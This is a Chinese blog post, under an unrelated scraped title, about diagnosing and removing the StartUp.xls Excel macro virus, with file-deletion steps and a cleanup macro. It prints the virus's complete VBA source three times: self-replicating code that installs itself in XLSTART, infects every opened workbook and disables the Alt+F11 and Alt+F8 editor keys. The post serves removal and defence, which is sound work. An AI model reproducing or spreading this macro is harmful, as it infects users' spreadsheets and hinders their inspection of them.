dreamleague17另类球衣:遭遇StartUp.xls宏病毒
遭遇StartUp.xls宏病毒
http://sheng.javaeye.com/blog/741128文章分类:综合技术
今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主要是自己学艺不精)。
病毒样本如下:
Vba代码- Sub auto_open()
- On Error Resume Next
- If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
- Application.ScreenUpdating = False
- ThisWorkbook.Sheets("StartUp").Copy
- ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
- n$ = ActiveWorkbook.Name
- ActiveWindow.Visible = False
- Workbooks("StartUp.xls").Save
- Workbooks(n$).Close (False)
- End If
- Application.OnSheetActivate = "StartUp.xls!cop"
- Application.OnKey "%{F11}", "StartUp.xls!escape"
- Application.OnKey "%{F8}", "StartUp.xls!escape"
- End Sub
- Sub cop()
- On Error Resume Next
- If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
- Application.ScreenUpdating = False
- n$ = ActiveSheet.Name
- Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
- Sheets(n$).Select
- End If
- End Sub
- Sub back()
- On Error Resume Next
- Application.OnKey "%{F8}", "StartUp.xls!escape"
- Application.OnKey "%{F11}", "StartUp.xls!escape"
- Application.OnSheetActivate = "StartUp.xls!cop"
- Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
- Workbooks.Open Application.StartupPath & "\StartUp.xls"
- End Sub
- Sub escape()
- On Error Resume Next
- Application.OnSheetActivate = "StartUp.xls!back"
- Application.OnKey "%{F11}"
- Application.OnKey "%{F8}"
- Application.SendKeys "%{F11}"
- Application.SendKeys "%{F8}"
- For Each book In Workbooks
- Application.DisplayAlerts = False
- If book "StartUp.xls" Then book.Sheets("StartUp").Delete
- Next
- For Each book In Workbooks
- If book.Name = "StartUp.xls" Then
- book.Close
- End If
- Next
- End Sub
Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWorkbook.NameActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = ActiveSheet.NameWorkbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)Sheets(n$).SelectEnd IfEnd SubSub back()On Error Resume NextApplication.OnKey "%{F8}", "StartUp.xls!escape"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnSheetActivate = "StartUp.xls!cop"Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"Workbooks.Open Application.StartupPath & "\StartUp.xls"End SubSub escape()On Error Resume NextApplication.OnSheetActivate = "StartUp.xls!back"Application.OnKey "%{F11}"Application.OnKey "%{F8}"Application.SendKeys "%{F11}"Application.SendKeys "%{F8}"For Each book In WorkbooksApplication.DisplayAlerts = FalseIf book "StartUp.xls" Then book.Sheets("StartUp").DeleteNextFor Each book In WorkbooksIf book.Name = "StartUp.xls" Thenbook.CloseEnd IfNextEnd Sub
通过参考网上一些资料,采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开,没有试验,不知是真是假):
一、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls
,该文件删除后,Excel会自动重建的;
二、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls三、新建一个空的StartUp.xls,然后录制宏(随便录,只是为了能打开VBA编辑器);
四、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:
Vba代码Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ = ActiveWorkbook.Name
Workbooks(n$).Close (False)
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
On Error Resume Next
Dim VBC As Object
Dim Name As String
'Dim delComponent As VBComponent
Name = "StartUp"
For Each book In Workbooks
Set delComponent = book.VBAProject.VBComponents(Name)
book.VBAProject.VBComponents.Remove delComponent
Next
End Sub
声明:本文的资料来源于网络,本人在11.28测试过,还是可以清除的,但是不同的情况不同结果!我写一个测试到清除的整个过程的word和pdf文档,下载地址:http://wenku.baidu.com/view/04f1ecd9ad51f01dc281f19d.html和http://wenku.baidu.com/view/9b339869a98271fe910ef93e.html
StartUp.xls宏病毒清除方法
第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls;
第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.xls,Excel程序会自建该文件。
第三步:新建C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\startup.xls文件,输入以下代码(代码在图片下面)就行了,以后再打开带毒的excel文件就会自动清除excel文件自带的病毒宏代码了
(说明:第三步比较复杂,上面说得太简单了,还是去看我的图片,不在这里写了!图片地址:http://hi.baidu.com/xiaolincc26/album/%E5%AE%8F%E7%97%85%E6%AF%92%E5%A4%84%E7%90%86 我的相册有,只是个人测试而已,如果不同情况,有没有效果就不知道了,不过可以试一下,我相信现在网络上像没有写得非常清楚的文章,那些图片命名得非常清楚)
其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件:打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐)”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾》》ok就可以了!
(防止宏病毒代码,2010.11.18测试可用)
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ = ActiveWorkbook.Name
Workbooks(n$).Close (False)
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
On Error Resume Next
Dim VBC As Object
Dim Name As String
'Dim delComponent As VBComponent
Name = "StartUp"
For Each book In Workbooks
Set delComponent = book.VBAProject.VBComponents(Name)
book.VBAProject.VBComponents.Remove delComponent
Next
End Sub
(注意:以下是宏病毒的代码)(声明:以下代码来源于网络,纯属个人爱好收藏,不能作为非法用途!2010.11.18测试可用)
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub